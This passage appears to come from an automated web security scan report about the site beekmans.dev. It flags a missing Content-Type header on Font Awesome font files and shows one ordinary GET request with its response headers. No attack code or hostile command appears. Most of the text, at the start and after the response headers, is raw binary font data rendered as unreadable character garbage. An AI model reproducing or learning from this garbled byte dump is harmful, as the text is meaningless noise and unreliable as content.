          酐JöQ2a%lºäóžE= éí¶|¾«I>’Çz°÷OÌuJs¦~—]Ä×i¯ÄÀúÒÌãÑbFíŽÒl»[ ñ&…¶4ÊØ­×‰%l†Œò˜äØìé> ¦ü¹SbÁª‘0_KèôŸvʬæQ4£¶€ù0+îHVpb¬½›¹£Ð˜%cû^¢ð̆£¹›a¯ý¤‚‹ÂÞpþ Íg仡iWÃ=Ïݨs,zõN¥$0Ÿ|UÔ*_¨–õ¡×ôËuB?êg¦-#Š &4£¹`|3´7÷|˜¼¼Gz£”'ò‹
          c1œm‘…ЯœôÀXôÂʋ
          ÐÝEñ±w"‹µ¦Ö¨#üÚwt¥­ÃÊ?×o‡MÀxÞpl¼Ëü“w=	q£¨×Ø|.1£êՅ&˂:Ý1|†C%@'X𬨎c$vÔ$y…šÈqKP†¯ßÉ×;ցb^Wˆ
          Œ¥`OÛ«(>Æå^ðE¶véÎ1
          ‰j‘+ËÒ%²­ª</äP¢$îZ)ª$hw¨aH’Öc6ØPÉàåÿDþàT<Þ<Œ(²Œ-×Lš-àeùÇò/	͐ÔÇpª#wšú¬˜é“lPa:ë²!Ζ‡Â¾)lÈ¡ÆEq("Y²MûR,wüṳ̈ôn¬ÕpõŨ¾H±-v°7e•úN×¥²bD¬X*j¨âßA»ºf«âçÁhÓæŠãÇî"ވ­½dAÿvùp%óWnºRæé洙ƒ:êãXw׀÷¤iÌØ´çå]ǂìÒuÊP«õ¬W‹½Uõ¡sR1yù­ó:ÿ8˜BF•n š×‹ª’1^vºß†ÿÿïX®ä$Lg«Xðß?兹S¸¢ð ¤dI*NZaVJà¢?é*ˆ³ÂŽ_¢ÛTƒº9$tي9èãk`¿QŽFoö©h¦Á¨–+;†MʛxIWÒ
          Þ&t7zk¡srM+òB|wÒ7%”c³¹Ò9J.;ˆlí\6¨£O¸äºPp®}–b`ô2Í~Wpd’71(_µ|2¢|¤;`lV@moäÓ¤¸d·§«[áÖÜ/·ƒÖ°™¸ÝŒŠ¹Â·=Þ‚2]N9uOö)c±Èk·Àæ#ÈpÆóW1r!\
          ”öæ"£Âu1†<·Ü®4ËY¢ƒk7$ãMœZ#H~Çr©Š/:Q‡Y»~·C×ýcl—–úŒúS«iå‹xié¨m)|*¼aóÝT±_½O•ýá‹(OHÊYy0=͏=Ü¢ïj¸#»èS–æ+æ¿ÏÕY@sS¹ÚMkދØTFwl.¼4~Î
          þKyáãÄp¿£‘~óñ#_誟'Þ‘æß~žˆâIþ8†;Ïá÷Ã_»½âå/W1½›ô1]ý×îÿ£JC®î¦kþÃ\2U_ªò“ß'˜ÈÂ8“`§£•¼ž´´÷•¤ÇþSÉ)EÃz̅ÒÇÙzŽŽãE™îºÏ©ƒ3Q¾KËèß½þÞ²
          7ξ~N…Œ1cFÅ~ç—GÊkL[àÅ~ýû*Ê3•2tPI+íµï´@õ0xŸ‹ÞŒÞ½W©_ 8a˜Ï*$ìxüN’„C8—ëvøl¨Y}ŒoáÆ²”JêN·,_ÜkÿWZ€FdØË¬
          s|Ðé÷H?d,4Ý"s­¢à˜Ñ‹”hRðÉoŸºðηDï_e`»b.´¬ìhw%æ+BdüÕ¡ Ù¢¼b†±QÀ|š•x‹ïGµ‰Î/‰‡JÅIfaΆÙà#Œ€!«;Ԃ±!¼B$v±1
          ¿Êœð–jéƒUQh_€|	‡jxÙ¡gɃîjïo2n.Vè;qƂ×Ý`UŽIŒJÁ(¯àÁÛu¤”õ¡	]_†a…ƒý¸-µf¹h=P
          Solution

          Ensure each page is setting the specific and appropriate content-type value for the content being delivered.

        2. GET https://beekmans.dev/vendor/fontawesome-free/webfonts/fa-solid-900.woff2
          Alert tags
          Alert description

          The Content-Type header was either missing or empty.

          Request
          Request line and header section (395 bytes)
          GET https://beekmans.dev/vendor/fontawesome-free/webfonts/fa-solid-900.woff2 HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
          Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
          Accept-Language: en-US,en;q=0.5
          Referer: https://beekmans.dev/vendor/fontawesome-free/css/all.min.css
          Connection: keep-alive
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1127 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:37 GMT
          Content-Length: 74316
          Connection: keep-alive
          last-modified: Fri, 15 Mar 2019 09:41:26 GMT
          etag: "1224c-5841ed7b2f150"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: MISS
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H83F1%2BjHE5MaY1Xg0Jpr1BtbpKG0qXuHbLipaViTSSo6RGW%2Ffm%2BI8VUUi8EWFhf1hai%2FvyTvsuuGjiEvBgqwNYsycEijSe6zkVyYNZT9Ql8r5PwP6WuFzGs2mTaWW88%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a5333d1300b2-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (74316 bytes)
          wOF2"L
          ×p!ðIxÔ?FFTM`–
          
          ‰õ‡æ:6$$, Š%Ú_[‡@’‚¸íS³HoV¥kŒ(2Q»´¼U…
          ÙÙŀî6üµÊþÿÿÿÿMÉbÈôï’ Fë¬Öe¶›ëȜcTÊÅbˆ–¬ZðÐšÌµî ›|rP½ùtH¶‡Yåá°G͏ӈ°Fhok<GhގæíÇ>\Ê.½ÃÝeJ½•²VäD"Á¸æœr¡ïlX-¥ØÕù	"ˆ@)¥´AœøÒ)犒@D "‘}æœsžgC8(˕…ঝ“m³höÈӄ#´Íø¥¹óûŸMw&¶‘ÛÑ4é1ÑM8S‰JTb21™¨L’ék;9'ïùếìfþ]öQ«=k´ËˆŸãLr‡‚b‹ìy÷j}Bâ¢{Çÿ;!يˆa]´ë}–0ÿ·ÒþÕ`g‰GªeùZgñóo;Ö^½×»’¸øâŸb/ûϞ³¯16†V/t˜%GÞ×rx~n½õ_ÿ­Ù€Á`ô`ƒ–}VÐۀ‘ÊFmˆ()ÃÜL†Šށ‘èqƙg4Ɲž^Øg\òósíŸ6<Ñf'Þ<"–gbj‘
          šFñ"¢%@½Ãÿwíó¾,‘-²#Î[ !ëþº*:¾'/ÿPõ¬*͈&YÄzÄ©
          ÔÓ½ÎîýšúÒúø€,¡˜†ƒÕïUýÏâAäÅpA€)’(*Ä’þ~í:…عrUøôn}\廽E“²¨éJ6š‚$hY¨¤¦)}Ï2–¾íˆ›ˆ©Ã™:~X‹Ù:¥‘I¬r*ú‚Éö©ZU½¹Uíæ_U¶5ÝKŠÉ¶:8¥‰ ìæE2ÆÃÍ:øp®Àî
          0Ȓߚ ì¶e%Štê萢æîž×Þ̓óBž|P%ôÑÜþGŏÜ̃Q1”дɬ¼™³„q6˜Ãʳ±û¬@‡	ýö°QæÇÀÿÚ´¤VjìdÉã(qÐÉև†ÂÕ½íL«W1/ëK‡Pž	v滌óJ®ò§àDkÐÞ ³¡š‚¥ZJ™ðæDxmÌð¿â—Í•-€Š‰ìõýG¬7]·Epvb‚!”%˜®ÈòYÚPg0BÝ\³ýùœúŸÔît“AC å€!áCÒfîûîÀbcm­í9÷ZV `“öAÒ=Û„Åjü/]å¼SökÖ_h1"I½»mÒtí*ºšƒ ™—þ—ˆ"—c’#Tn5÷ü^š¤íö×ñ„ÄXñÜ!YûßFdÖ¿ŸŠ?ƒF,ô€ÀpHúùúx{“®-Ú1V¥ŠWØ'ù'ñÁ
          AQ¯ó=ëww²«•@0<é}Žde¢2T4ëÖn!Tâ®JJ¥™ÛîÐ°ðœƒò©hâÖjãxø þ‡‚séÞҏ¹cƒ-l¶·ÿ¾êÃ?IwÏü—o­íB؊ñ`d?I$͙ÿÊi]Á;!qï»Ó³ì÷Ľ¥×å8¯OóúpªÿK%éWñUâra$E™`«$2	’À-dœW”…C§Ç½lN¦ŸíÎa¯J²ˆƑ ¸‘;΀—^–ÕéÕ½lnOïëi–õ”ÃqŽ÷9\züîß?Ž¿ÿþÄÝØ`$À4рÆí$â?Þ\`¥”	_û‰	U*¤ÿ¼”e|‡G„ÝžÚÏ)Ó¿/UÿÛ
          /Dÿ01ðÇ´~!¯f?›Í,qï¹÷6»oßnuh Ò$?%"Q&AJÝ
          n4A¢ä?$_¢ÃÔÐú‰ÖKúY H鉔lKqr^llÿä÷&ÇÕr–³XÏjËq"®Âú&„ÐLn/ê?cKÞ窨C'ÚÛ¼Œøßÿ7éy½¶8âj±µQ¢&–²”íüÏçœùýôý’ÙƌöÄ¢ç‚Þä}ü½AæÞï}kjPAY(ÈJ Ù¤íâZÿOQ»w»Š¶”ŠâžÁ˜jß?îE§ÿ ´û¤”&4qÁ–Á/Ùw’N’Û{Pà¿Ð²wÂͽ^D¡J.BÇ$LïáVŸ|)€µ…lcœBë>¡Æy~+®ÁæiPÈkÜë2:î Ï9ÜúÃuʔ¯÷B-¨NÃUçéçIq¨ñÊèø*þ}ƒ~Â@Zdš~1ÁPÁÁO¼IBMÍÉ
          	šžÿ‘	ˆHiÙxî}få<ç=ɱ¨Å/iÚÁ#FO›½h‡N˜4eÚ¬Õk7ìØï	³æ,X±nǞ¾˜šô6ÔhãL“Ö²tq÷¿”¼’º¶¡©³›‡¿(¨è™[ÚØË¿Òñ×§ M&+¯}AÙ^ÌÊÍïUÔ­ÏáÑñÉùEåõ=Mÿ𹉤´¼¢’9‚@c	T‡/Vé6w/M¤°U»«;F r…ÒÿîÿÙÚ?¹{|ýò÷م•͝½Ãã³ËۇõS5óåÃûíK ‚3œ¤Ú~\TÍ8oçý&^’UËq½c¢¬ê¦¤EÕ/šÚÍÖ£“ÉÇË;I…7!$ $*!9#§¬¢¡«g`hdbrfn~qEus{—î!á1	I)9u-ýûüÝ·+—y¹—ƒnø?ð Räšy±>$ƒÂ’K+ÂM\ZîH¬ŸP‚ÁUzžä$|„‹ý䊘	‡S¬á¾ Ž‘Y$öë½eý0ï3/>”äT>*Œ‘’cܹ‰lª¥kâ”ùYRI—g©·°hÕZ¦=x–ÅT99˜ð(ÕÆ..O OaÉÚêþ\C ñ´H~sçðüáùýÛ?ç—X~Aþa…	`áÉh==¢©Ç•çB”ý“(ݙ¬óŸìªe…•ÀzvnßÙ# Xàä†eUMm¸¹Xt\¥YF¯·G¼Ç>€ÁBÿÏ{ŸÛ:Oc×Ty‡žëØK8û¶ö]ÛÔU™gi¾oŽ}[ò,
          ]Kxކ@àûóåùñt\;¯¹ÿæcs™Í,f6ãÇ÷ïøª²RÝÃ÷îÐ˱Œ«`³$FãæÌÝ·®.®ûùݦºº²âõÓ#i¾ç:¦®)ËÐŽ"ЧޞÇ>ƞeèšÊ’8
          ÿY
          ËEßÅYۄiUÊn½UsfO—€?çÍj6´*Eè¹ÏÓØ×Ež&±ï¹Žeê4…À‡Óзq¾gš*	$}&ÅÅF†ù=xl:ƒ'ü þ=÷ÚÖU™¾eèš"³4Ià×½+ó4Ž|çúÝþ ž,8qáՄÏ×XõôJü¦§^8ü„úþî •J=›aÆ"¯SG'ªÎ¶¬ŸWò{s u/×ϼ¾3ç«pšJûÐ^O”¤Q+»ꏝ—Ë¢Ð%Õ¨£‘¼æÕêFÄùG(û˲DQ^Gªvª/[¢¥ñª~.ÛK£3滖\‡g®©òÿñbª¦L
          7Œ@)vÖü˜ Žªë›ßM+ø3)Bo 0û®ØíµÄ´ÂÝî2¦ÑÚÇ*ÊêfBý4¼F‘p7ÂZ…X¼ÊyJ8 ;X.›=ÙkìÊY«O#ÄÎ?,ØÉ{{‰+ÖM¹¦a»X'%û÷‘Çn–µ>îV+w~Gªæ9à`DL9‘bºe“Mh$Ùh\Åù!1Ú+êruúybføÝ®t”lÿQ͜=39¡K¼‰‹ä:(uÃùMùƒn-€¬gI–¸{ÚmSÝR)ê½~–¼„MÁCäey¬hº±B{£ûB«8ÉÊé3s/|Àq/‹C’§Î»SŸÐGeOÏÑ4ߐjŠe¤=%Öõ.òM|Ó$»*ÖX£¨6Jc6oM³^Çw
          m
          ƒš§^ã»;GèZT
          ܇ºY"ÏSŠ?Ƭºƒ[짘o +cë˜âa·¼<(`÷dïSO­z¬Š·°À¬³QìSº¢lyisd‚ºLïƒY@b%7]½è'…šE­ð¬
          Fa¿’¤ßÔÎËُò˜4]f´,Y;LæH̦ìG_”ï‡áÞJ¹ËåJ^²Â
          _æ\0ç' nÑ™oëí›àj)€3n;ÁV`ÑßI¢u•¤eΩPÀ™Í¦‹´¬ÕÏ…0(ÓÒ/ŽÎÊyÿŒyˆ*Õ1‘ɢϏ Ôvq³Óµ•È¥®aµ©øúW@Š(ÙX˜Èæ¸CÄÄdZÍ,£ÄÚû©@Þù…
          ¤‚ns¬³LÀKT‰LGÛdôÂ"³Z®ïBæ€ÜŽ·]=ù.?n–¦ÿ€#àņ¯`ˀŸÀZ˜Æ$7ó($£ü_ÿòëǃþºV eµåE©·>Üù­2@®y{
          œ÷èÄAïÐËɀKýñEK‚qc–Ð+M¥®C·Å‚7UFv‰êæÝÅîJEù!Jب•=j»ÒÐv¦|È4×jiÅ­m®Æ58³!É8ÝØï.Çų‘MرûÉÀÈBޓB„O\±Â}UhdÂãGæàš±üGïÂ:ß3ˆñAIý
          „Ðu/ãKõ)ž•Šß*êÑÄ
          nx0àÒâ¼pÂû“fyÏ.>cü UEÔß:sqz²Zl}ïNÇ$Q¢Ã¿øá~{½(¥îÉ`¶P½‰ƒcS¬´ž‘ÏׁXGfëW.—¬;¶)¤‘Áþ¡…tÜê¹x6»!çÏùéÚ)®cß¼ÀñÒa8¢È[UKEË
          hàáßàűd†ëÿþhoͣšëW¦Ž±^?‚a™a¤ 
          Îyw«Á1¢u'®¶Õ£M)•pom»
          xÜßu噙À-g›pNâ2I&5í†ÎÙíƒ/Ž"¯6Œ‘ç
          8„1Mq«
          e„,°U™‡†ÎÀÁDjÛ¬Écתּ™îA5¤Æ£—Ãs—O{Q°^À_´šT¤–y¾ÈŒèPQÈ~ÄÂ0ˆŠcÄ·	QS^̹ Ú×Ê)qŠñaÔ·(qßY户;|a 6ÕæÛÕj3{²ï询ÐË-rH6* Êa1­pÌ14DN 7à®<8Hp¤=ª	B ËÆ£¾ӕŒÊ–¶ò¶¿Ö8‡æBš`4|€œJÈ}g1XzhJÍ¿Ei!²úò¨¾šç¡‘mbm–¿²
          SiÝãÛb~SwÌAHnÆþR[i—xÙd¡  è:Ž×’D°Õ @ÙÙ¬1†äñ½oü÷¤ú
          ž‹èl³º–ަ€ßÍl” µ<Y¼2ˆð[ïCÝʧ³±i½¯·0Z}ÅeÊ–ù¨m­uI/ÕӍþÑ ¯zB9Í¡ÈÔÛ,ÜÌ®šçïԂ ðü²Àã+ÒjÃ
          S@œa+®€5ŠÜ0‡ÜÓDÈ\Äô@Ež£¯°_[ö"[eÈE%¸x‰ÈMy8šTz[9ÌëM÷“ÁÂ]2ņ˜¡/ôDh^E‹i%d9™¤˜cҎ*‚•¹GÄ
          `d½‚ˆøŽ­wjÓ>7+ºú¨m—Ì†Ï4Ï(µxÅë[yñB:så~è0WP«ªF–¦ÆQVÏo'ªÊ‘ãñæŒ]C)ȗ§vå1“REY-?«ìQÀW1›zÑ?!é`,ÃÜxR?ƏpUÀ¤	#OG@‚*.Œ¿ä¿X}Æ_&X<³µbGÏþNôdðlÿ9ý7¤4…1ÿl-¬*K³9}FÅ1/~ÿ U
          ”Í„éayØOgÚì£&á¬ÌHâ¢ëú»äëˆ\ŸÍöȞIrUêKJÙÄF€é:ßòîB@Xt‹ù&OôX5Ք%Šÿ¦Ç¼|NîK™ž´¶qh4`‘9¯GçgY–`Š–{|ßEè~ˆªÉwÕx¾0'0çLxt»ßúoŸßc’**.i¸\¶Qý¡çüÁ½‘¸úÙ1[4<5'®D;ààÓ<¼Íûžü
          'Y bu¾ËùtBQaßÀÒy’^6¯RW‚>¯¾XJ„EêÚ×Z)}HT¥ÛB^®iº úD)«ð[éÜáz¾åûÃféDM4iHá¼Ea l‡ÔJw ;Zç^£ÒT‰RQ
          uèæØ:n~XøŒ¬Èï6aÇFÝ0¨˜
          Šò|šF4¤Ë}”Z?Eú_rô.(L*‘ÔÑæ¨ò#
          7~÷)Í ˆy̐:šr¶²R?‘?2¢Ç\yBtxOš…”
          t4 çã9‹Iä	爰&øÈ6ã"-<*GIé8žG“¦c§s¯e¶?Íia\.ÄÕæCÑ¡>I~€áîì£iK¢`åCGÌ#	íô.nœG .U†w™bƒdη¥j3gˆ!'\ÒðȂ§û**>óýÃJH`]VÍ8¨ò±‘½±Mæò[]·ºš¬C“-¢&Ë剙U²R>ÕmⱇH֓@‡™"©lƄ}Ñ8ð,Ñd!Òa–E+æ4ˆ1%‹ëõ•‚dhdÈM,¡‘FbDÀª!"á(“ëCªËÚ±à// øbq%”“Aٝª¯dz+f_ÄBm•yfݒ¼*®xÿð‰ò!
          ø¼,1.–Çb~GoI1™7³R|tV±ñÚQÝ_-!’K¥É˜ôðM„±•=u¸lެ¡QïÂà]÷œà”©%¨ãÙº¤ôÙ‘K„…Mö÷0´ÆE5ƒŠ?à€ö}bÆe÷z8ȑˆy‡zÿŒ¤.¾‚Xiz
           Ÿ‰ÐMµ<_:
          ÈHIKênS’qÛÑy—è‡ÎúÁ³Dd½c9†´“‡z%(/Å/m¥Ë(™AF	ß×õ®þä„õ¯“ëŠñþNhóy®xš›hݝ÷¿Ø.Ž–Ÿ³’µ»<‹’f:ÔåJšNĵ*ýÕ¸¶ `åm¾3;4£GP(½ OÖã»ê™©#Û¦DÑÃ5HrÑQšgñÃòhŽbŽónÎà“Ûv܋£;à[ŽèÖ<­³ýF"wêþ̓¾€la¸šê¢`Õá<lß×ÓVŒåôZmQ2§e¯Ò'—ì†vKÄ5÷È6Ãëû#Y™oëJkKæâjÌ­Ù®’ڝ1b0XÍH°fhUüÏÔV¶RNøJ:¥H‘ô“®ûY®cäAù;«"jf™Çš£g&Ë/hã^ŠÀ^’é$§æ³-9ŒÑ³†ÌÚí	iÐIG:c
          2bßԊð¸2ÁOx—+âõ¡q6ƒ|˜òúÔ%`§mI¸_œŸ˜gÑsh°úݐb¿Òt|{ì'¦%“K¥¶î¢d¤§NRòî¹úzU3…xЎ&q
          sDLš%¡-C$8щCq›ê›Zs]Ÿ’*ô§çç6²ÄRƒn®Š|K•ÅG†Cã&UzQ0«Êrõu‘\Ÿ¥Ê.lVµùª¾à€Ç¸°I•†ÍFíåɤì²NÁÜÖ¤¬üа|<êGZ|"ËZŽu
          ßUGU[‹7‘Ä¢§Ð­h=?Ò €œHj‰w’cÜB¯¼É¹^æ·¸`ìÚcSiES¹"UQ9tíƒOZ¢y/;ì0X	š­Ñq‘•îø*ÁŠŒ~q—~­cŸ·<Ó%1Ât-7Yi’ÜÆU	¥¡&€Å¥Ùd̙w—Ò#U‘åÛbIuCªi¾ÄDïqc<ÁŒ¤h
          òxÕ)×È->Ž;õp=3d	©ù¨®.òêÛfDLÊÛޟ¸Ã¨>¡‰aTC€Ít{u!é
          ¦KW|H/V}þböÝ
          yR¨\'™BD( ðÁˆØ¦NHkh¡AŒ鎅 (˜¢áK²%[±²’â¤<¸P<!rY×YÆ( ß¬ƒ¿JLzس<‰†4ŒZ ²ç€£@Äç+@8¹BÇÇþsÂþæ„`׃jY·A(d7k‹l’¼Í|tŠÊÍ|òš<n~‹’n¿ŒEe:^¤á
          çŸõÌéöç)ëìŠá[3¬€ƒÿpnË{Ÿýޏýw7jUUiHCmR‡f­zU¨óH[Bš3¦li‘<„Ώô$÷Œ*:zxLÅ4¤+Nðrc¿³wã¾½s ܋¾×gr½_î«0èé=ÀM)úgŸDœB¼ŒÊx†x—£WÊ=¬ƒ2ÿfá"ì£]PÀw쉢œÚƒë0ê,nÐ+ú@té¡BÁɵÅ}0áâ1é
          q“&¨9Ta³Ä ê3Õ
          *jEé¯s֞Ä÷m겤f’:KÁpYYÝ Ëðr96Åðê¼ó%×ց×;TÏ	©r÷‹NP:íSËûÿ3Åçnôû¢ÕôZÂY{Iö~²ɍß@’1e×2w>Åbü7xxö.ÕsÀ!«‹7gÔú<@ q“Òžì&@RÚz¾ÌS
          $ª¹Ò-q3%ng;¶r÷a7Iý­Äã»R1Vzx[‰»Ñ!¹;w0',>la*;¾#¹ÿ⩽L’_ÍÎ;vº’½…g˜©j˽€Ô1/v“LkiñZ/:ív!«QUÆ%lt<smµ¬»×‘ç|všKÝ®ÂØÔLk‰áÀ±‘&	Ã6ÉâÇnµË¥ÞÌÖ.¯¥¤mpŽ.g NJû*ƒˆ,Ïëš`³Ïá9
          ¨µ^éàÎI2åяõw§(Xó½X	²÷¸ðé€lŸO\%?³~¢
          _Ø\	.¬ û‚÷ÐLó9’´ZMhsÃ	1Q0¶ý•ÇԔÉNCÓ}
          Æ"yGäM?&ßp1ÛñF“AèGF„yp-)Iïað刵EPªÓ/1Ùôq+ãºÁ%桯ˆdcª¹è*¼Û¤‡å†ˆzZ<Dú³X!ò+·zðÀªû€¹AÉÓ+yzڈ"ø“ª ˜_‘à^.Cð!#³Él£[çM9àxËÝXÊo-(ãn*w
          ¦#圆›G¤‹q°*ðW™|a2Ÿ(f•ï®tÓۇ-É£‘*õ–ØFÚ΍ÙJmiuûV±¼°²µ1WîU®Ú™¥¨Ma&PY)¡CâÄ×,&£®$fWü$ÔOƒ„£»[+p+²°©‰mÚï„AõÙí/ü§ß}ÿ˜fÚzÎ4n‡:–î(óå̏ƒ9Ç>“ùÕ}††®S۞Raì0ñ°s†®u!ˆársa„½ºø1À•«’„üöƍS'n…ZZ¼v-aþÛ·OžJQžëÂç¶?#ã{•YTb-iºˆß³Èð|A(6ýŸš‘YáäÉ0¦ãY@ÁÆëb@ú¶EA®`imì¨+z¤€:ˆD
          ‡%*{¹®•H36¦sl«ùÅ­#¶·ºÁcŠ^Ø*q7ý휓T‘˜€šÿf|p“Y8€Ëhõ™1…‘ñÇÿ„¹hBQ5‘¸t~Íjj*Ž
          ¸6Œ>¿s:<ƒ¿pbô†l‰dB¶ÅͲÛUŸÅ“ªËÎßU]Ç&º‡‡…œ½vã	‹Ädƒ,û7«PJºª•±‚Y~5ó!5RòüUڎ׻hpY…è߬є\Ì…‘`†s|ªˆ¹yÃo·e=]ZgÛ»uàïof&?ÙPÄÜÉ#ÓÍðB^¸pÖ3UýbÚvAë\$³ãS,[Ó¹[¼ê#5]üÅ:§ö…L¾À‰x8¬l£ÉâÂóÆÐAE²Úš‰S’zBԏ!£<âcl¥D">Í6…fôMFR]R($/\‰^Ù¬ÔÄÝÚ¨›ØFÊHÑÇù/°þ±0Î%5²f½Æª9E–U2²ýE’Ÿir:ª“s_ºæJ”£4-[#³"V“¡Z’B	”±HÈß×úr¸Hß ó'ì% «kÔ<!ïéÁ³Šu£r
          c]j2ô„ej%×`®E{è!%r‡‚ “”R¡…f.}—.¨©™ËÌ®ñàŠŒ)ây[VW§k40e^¸Ócq着§èAZ¥ÔSö²Ó¾òÕRÅ®ÁJ’Kü)ŸK0,ö3#Ÿ¹ñ£j×ÊU«HËF	¢mŒÀÀ#ó¬8žwwo ¢wLÙsUæŠGJª¥o„Š1)—§…¦ÀqÝݎH1„²Uæ!I¶b(±dÈèÜ%aQ³Kÿ.¯Ÿí±ô±&š¤J.=wĐ(Xظ
          +'ŽíÓ·][~°z­"d(0l“¸ûN•çõ諎¨x²ö÷‚y¥Ö]T¡/Ò^ÑnÇzʄvÔýDVôŠ£Žý(¦·%¦¿üî΅}›Dw8Ù	¿ŸÕ}?Őê¿QA]'TqrBØD5?¥\jZ90r–Ü‚ïßbX—ÀËÖ-ª̪Ñ҆¶¯¯MŒ¸`›Ä&"ÐÒ·éJ2ÙV_}ŒÈŠVÚÐ’Í"wE
          nÝ1°§·³½»‹ŽÜ¹;:|ûÖ¢%íU¡ö‚‹•3§©˜¡O/ü]»…M\„Ê	$÷äMšn6âó{c7"1¶p=ºf®„5Ý˳-ßÕZ-}z¢è«À!èÆð¿ÁlJIÕí·| çÉ·7ʍˆ.ª+UÍõ=¶«b »]ª¾—ó=á‰lϝ›þA—±«ÈúNGcÎKw¾Avdaû‹Ó2
          7’® šLLP¿_$¾&ý"áK`šÅ¤·[sPVJå·¡	¶ž’&éúÅ4Õ7o¥Ð9ÂÚ`Õ28¼ú>s]°¸éþäz$†vý«'7p…øF	³ÄphUQ1!‰íŒl÷»ƒkƒ‡‹æÛ9f—neג¿Ÿ€&ùl©á/‹¡dóÔ ëãïàÙÛÎì1‘¿ræS̓D"Cڎ6ÖÊ¿I½kKñ´/F†RF;è#AèÝ`¦ud®]°<¡"aÚ{½"¨xnîl!̏¢Wa¸ÑtÚ
          DQ×j©/ûoVÜT2¾Ö.çœõ4ÇÊ	3F‹]ÖO-Ú+q%W§œ1u¤«rɚC0èäUN¿ôß
          ([?˜KØs
          Ñr–ëb
          •¹0¡”"Axé1â½­¨e_àÔæÏX!0Œm\ø=rë酢{’Êå`Nᨧ¼Udî*Qàò·TøE]?Êà´$·l 0"C±rED¯š”³+F}QJ[ôf՗úÓ¹§¢Ä˜DáID^ÝÕòC(è[e1ˆ!#)껩f\‹ë~³ýc’òšç¤)MË9:ŽåÑU
          °8F'\ʳ©©v I*œdIÖúÎíwZ;š†NS†Ò+´¡Ñ™ElDCCC4êñ<[2c‡	eW%£`.ŽåšA x]•“º
          Ú¾L«Ö.Þþ*lJ©ØbɦAO	Ö
          Gi%éŽÎÌ™.”p@P—P̟èÓ$òyß:g„‹úHÖ­£Ê`‘<á!9ž{tہ± ¶g³Å´ÓÉON&â¢NÆ'¿_Æô0+ìNu€ªL×uàÀ:³ù™9û nŠ}jf¡ÙÇ&œg™Ä¼Awõ†>«Xœ1ˆóùzÞt–/ìYÁ߉'/¤¶¸fa?ý—¹†µj͏ÛLJØm2\\KÑÏÒ®èúåù_íÅ#ºü±vù^ø¡v£ ]9¬5~¤_8ª]9©—é%}0„Ìiyo‡ÒRÌ+vaª ÆóEʔ!,²pª =PÏó\æ]œ6°!äðœbÇ4åu¡+¨°j2ڒ.í¦ærž~`bu© —îÌQÀ¥­–”!!sŽY˜ÒrŒyàr6;¹Ï[Üéhm;zq³u2J|@;òƒë„Ê­ñ%i >™4ÅçÁI!ÆÈáÛ¬Š•]»²7xâÍ:¶98…Û¸fެâ̰øïª/òÞ„y+&\ßÜôÉ캥°_(…ävªã§.õ²%¼à¢ph
          !±ýâó4L’$Þy­ñRõ)Uùv@0}Ö\à
          0†L	¡è˜Z‘EŒñTßCÄ5RÐ2þ%%œ‡\	E8¶éK|øÑXÛÙ	_ìeI½–eh\¼ZÑþmÍ&|A$ž°ð®0öVçV¯çbŽëô• ‚±ùàֆž“æ÷”ïbîPm!†á§Ö7Ø*‚¦RçzèIÌۂ¡Ú¥"17¢ÿ£c{òñÒÞ_< *ôd3¦AÚ}	v /½Ÿžémni^ÙÊ£¸_ÍWeº¤5ó1V€Ø<ôžŒ
          ÷Àý¸žå©Ž“ŽÓ
          Õ
          ½åü}®Ý1EÝÆXAGŽFc^[ÊŘð”™‹¸’oЧ~Ïså1â©(•«×%Rn1—KÌQné“jé/»ßܺaz&·,ËÒ²ÈT€íqʼÑ8x¯ŽwKm='ÜY×D;áJ3 ±L+¡þi~Ò
          HrÍoÔDÏnÈ¥ A
          ñÕÐöP_‚“ŸsS‚”ZŸXóŽjy_Јä¿Á=&a±°N+7«<Ó­³«î ¡+ØO·bÞwŽ]XUùî›d¾Cåç½7Í÷˜‘ZDZÆ4vh˼,KûgtÌÑê»nŽ™øÌRL¡F˜0¼Àü¡U(¾ÛŸöSúgw »¥áÿW„P‚VMÎ2ƒ/Oép¼©óL@±úª”䥶¸$m«ôÓÒðŒ7N´d·ü\‹Žñ\8¼HâQÏ«D-íܤ9Ö©
          J·h!é¼Qf4¤ú€ëƒeçG’ÿ-åÙùBܳü(Ù©Bއ¸Àxæ×®üͽ¾	O”ªGvEü&ÉÒFHŸ.Ý-*À‰Y†Žïd‹?JnHiáfê–šã¢ÉšÖ_ÇåS=ªÆý.Œ‘Î)ї	¶ÛY2=>öáf³”¦Âž‘%õO¯ª’I€|„
          ¼ÊEÄÚ¬”w9{Ñ8šX^[ë4Ú	é+¹ÀBÊØ”Ø—íčäéÃ{j0Mwï$>_ÕÅa.Õáz¦'ÙÚ¨éàa¤Î´k07ÏðcÞ¹·<%çe˒	ò\€K×é1Ÿ2\\k—¦ŒÐOGq)T˜·ëòšô+êéÐ¬GÚz{ªåPêX(æ˜jñŒÅ´‰ã¿ÍÌ…íU͐@HI%¬ê~ˆOÉ/>¿›õ™Îd&ùzæ:œ¬T4셔jËH(5†xõMó½eµ¤]M½¤êv¯|£6øWDã~®u)ûú*—««™ófuÔã°^ï2;…WR¶ž†TCbáb¡Ó5Ä5i(OÑûœ+'‰%Y
          "CëvRÑY1ˆRœ«5žWu¸Y´²\ñ,Õ{GVA­On6Öæöz¬ˆÇM—Ynäñ¡Z˜n@šÀj 5†OKh;×>ÕS`
          L1›g(Ñ"ë¸T.ŠlšìŠß¿.ÓLÁ׀D9)á©
